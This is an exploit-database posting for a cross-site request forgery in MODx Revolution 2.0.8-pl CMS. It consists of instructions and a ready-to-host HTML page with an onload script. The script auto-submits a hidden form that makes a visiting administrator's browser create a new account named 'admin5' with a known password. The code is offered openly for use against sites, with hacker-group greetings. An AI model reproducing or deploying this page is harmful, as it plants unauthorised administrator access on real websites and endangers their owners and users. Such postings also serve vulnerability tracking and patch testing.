#(+) Exploit Title: MODx Revolution 2.0.8-pl CMS XSRF Vulnerability (Add new user)
#(+) Author    : ^Xecuti0n3r
#(+) E-mail    : xecuti0n3r()yahoo.com
#(+) Category  : Web Apps [XSRF]
#(+) Demo Link : http://www.cmsagora.com/demo.php?id=50&type=2
#(+) Demo Login: Username: admin Password: demo123

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm ^Xecuti0n3r member from Inj3ct0r Team              1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


#All you have to do is save the below code as exploit.html
#Then Host a website with the exploit.html file. A person with admin permissions if visits the site,
# will automatically creat user admin5 with password "newpassword" without warning ;) 
____________________________________________________________________
____________________________________________________________________
Code:
 
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>MODx Revolution 2.0.8-pl CMS XSRF Vulnerability</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
    var count = 4;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        
    }
}
    
</script>
<H2>MODx Revolution 2.0.8-pl CMS XSRF Vulnerability</H2>
<form method="POST" name="form0" action="http://localhost/connectors/security/user.php">
<input type="hidden" name="action" value="create"/>
<input type="hidden" name="modx-ab-stay" value=""/>
<input type="hidden" name="groups" value="[]"/>
<input type="hidden" name="extended" value="{}"/>
<input type="hidden" name="HTTP_MODAUTH" value="modx4d6fcaf3f110b1.95465957"/>
<input type="hidden" name="id" value="0"/>
<input type="hidden" name="newpassword" value="false"/>
<input type="hidden" name="modx-user-fs-newpassword-checkbox" value="on"/>
<input type="hidden" name="passwordnotifymethod" value="s"/>
<input type="hidden" name="passwordgenmethod" value="spec"/>
<input type="hidden" name="specifiedpassword" value="newpassword"/>
<input type="hidden" name="confirmpassword" value="newpassword"/>
<input type="hidden" name="username" value="admin5"/>
<input type="hidden" name="active" value="1"/>
<input type="hidden" name="fullname" value=""/>
<input type="hidden" name="email" value="admin@admin.com"/>
<input type="hidden" name="phone" value=""/>
<input type="hidden" name="mobilephone" value=""/>
<input type="hidden" name="address" value=""/>
<input type="hidden" name="city" value=""/>
<input type="hidden" name="fax" value=""/>
<input type="hidden" name="state" value=""/>
<input type="hidden" name="zip" value=""/>
<input type="hidden" name="country" value=""/>
<input type="hidden" name="website" value=""/>
<input type="hidden" name="dob" value=""/>
<input type="hidden" name="gender" value=""/>
<input type="hidden" name="comment" value=""/>
<input type="hidden" name="failedlogincount" value=""/>
<input type="hidden" name="blockeduntil" value=""/>
<input type="hidden" name="blockedafter" value=""/>
<input type="hidden" name="extended_name" value=""/>
<input type="hidden" name="extended_value" value=""/>
<input type="hidden" name="extended_id" value=""/>
</form>

</body>
</html>
 
########################################################################
(+)Exploit Coded by: ^Xecuti0N3r 
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
(+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) + All the 31337 Members :)
(+)<3 to :Indian Cyber Army & Indishell Crew
(+)Gr33ts to : exploit-id.com , packetstormsecurity.org , securityreason.com
########################################################################